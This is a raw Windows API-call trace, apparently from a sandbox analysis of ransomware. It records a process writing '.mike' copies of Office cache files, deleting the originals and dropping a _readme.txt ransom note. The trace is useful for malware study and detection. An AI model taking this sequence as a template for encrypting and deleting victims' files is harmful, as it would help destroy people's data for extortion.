SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0039.880] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpFilePart=0x0) returned 0x4f [0039.880] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.mike", lpFilePart=0x0) returned 0x54 [0039.880] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0039.880] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0039.880] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0039.881] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", nBufferLength=0x105, lpBuffer=0x2aed00, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpFilePart=0x0) returned 0x4f [0039.881] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpFilePart=0x0) returned 0x4f [0039.881] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpFilePart=0x0) returned 0x4f [0039.881] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec88, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.mike", lpFilePart=0x0) returned 0x54 [0039.881] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0039.881] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af164 | out: lpFileInformation=0x2af164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0039.881] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0039.881] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.mike", lpFilePart=0x0) returned 0x54 [0039.881] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0039.881] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0039.881] GetFileType (hFile=0x264) returned 0x1 [0039.882] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0039.882] GetFileType (hFile=0x264) returned 0x1 [0039.882] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x0 [0039.882] WriteFile (in: hFile=0x264, lpBuffer=0x21e0fa4*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x21e0fa4*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0039.882] CloseHandle (hObject=0x264) returned 1 [0039.883] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0039.883] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml"), fInfoLevelId=0x0, lpFileInformation=0x21e0a64 | out: lpFileInformation=0x21e0a64*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc3e4630, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5aa)) returned 1 [0039.883] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0039.883] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpFilePart=0x0) returned 0x4f [0039.883] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0039.883] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0039.883] GetFileType (hFile=0x264) returned 0x1 [0039.883] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0039.883] GetFileType (hFile=0x264) returned 0x1 [0039.883] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x0 [0039.883] ReadFile (in: hFile=0x264, lpBuffer=0x21e20e8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x21e20e8*, lpNumberOfBytesRead=0x2af110*=0x5aa, lpOverlapped=0x0) returned 1 [0039.885] CloseHandle (hObject=0x264) returned 1 [0039.886] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.mike", lpFilePart=0x0) returned 0x54 [0039.886] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0039.886] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0039.886] GetFileType (hFile=0x264) returned 0x1 [0039.886] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0039.886] GetFileType (hFile=0x264) returned 0x1 [0039.886] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x220 [0039.886] WriteFile (in: hFile=0x264, lpBuffer=0x21e71b4*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x21e71b4*, lpNumberOfBytesWritten=0x2af104*=0x5b0, lpOverlapped=0x0) returned 1 [0039.886] CloseHandle (hObject=0x264) returned 1 [0039.887] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.mike", lpFilePart=0x0) returned 0x54 [0039.887] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0039.887] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0039.888] GetFileType (hFile=0x264) returned 0x1 [0039.888] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0039.888] GetFileType (hFile=0x264) returned 0x1 [0039.889] WriteFile (in: hFile=0x264, lpBuffer=0x21ea3f8*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x21ea3f8*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0039.889] CloseHandle (hObject=0x264) returned 1 [0039.889] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpFilePart=0x0) returned 0x4f [0039.889] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.mike", lpFilePart=0x0) returned 0x54 [0039.890] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0039.890] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe1f9da80, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe1f9da80, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe1f9da80, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x7d0)) returned 1 [0039.890] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0039.890] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpFilePart=0x0) returned 0x4f [0039.890] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.mike", lpFilePart=0x0) returned 0x54 [0039.890] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0039.890] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x21ebbd4 | out: lpFileInformation=0x21ebbd4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe1f9da80, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe1f9da80, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe1f9da80, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x7d0)) returned 1 [0039.890] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0039.890] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpFilePart=0x0) returned 0x4f [0039.890] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", dwFileAttributes=0x80) returned 1 [0039.890] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", nBufferLength=0x105, lpBuffer=0x2aed28, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpFilePart=0x0) returned 0x4f [0039.890] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml")) returned 1 [0039.891] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpFilePart=0x0) returned 0x4f [0039.891] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0039.891] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0039.891] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0039.891] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpFilePart=0x0) returned 0x4f [0039.892] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\_readme.txt", lpFilePart=0x0) returned 0x4a [0039.892] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b0) returned 1 [0039.892] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\_readme.txt" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0039.892] GetFileType (hFile=0x264) returned 0x1 [0039.892] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ac) returned 1 [0039.892] GetFileType (hFile=0x264) returned 0x1 [0039.892] WriteFile (in: hFile=0x264, lpBuffer=0x21ed910*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af148, lpOverlapped=0x0 | out: lpBuffer=0x21ed910*, lpNumberOfBytesWritten=0x2af148*=0x45e, lpOverlapped=0x0) returned 1 [0039.893] CloseHandle (hObject=0x264) returned 1 [0039.893] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpFilePart=0x0) returned 0x48 [0039.893] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0039.894] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0039.894] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0039.894] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0039.894] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0039.894] GetFileType (hFile=0x264) returned 0x1 [0039.894] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af160) returned 1 [0039.894] GetFileType (hFile=0x264) returned 0x1 [0039.894] CloseHandle (hObject=0x264) returned 1 [0039.894] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0039.894] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0039.894] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aeca4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0039.894] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0039.894] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0039.894] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0039.894] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0039.895] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x21f1a88 | out: lpFileInformation=0x21f1a88*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x648)) returned 1 [0039.895] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0039.895] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0039.895] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0039.895] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x21f1da4 | out: lpFileInformation=0x21f1da4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x648)) returned 1 [0039.895] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0039.895] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0039.895] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0039.895] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0039.895] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0039.895] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0039.895] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed00, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0039.895] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0039.895] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0039.895] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec88, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0039.895] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0039.896] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af164 | out: lpFileInformation=0x2af164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0039.896] 